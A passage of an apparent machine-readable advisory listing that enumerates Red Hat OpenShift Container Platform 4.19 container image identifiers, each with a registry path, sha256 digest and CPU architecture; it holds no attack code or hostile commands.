"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
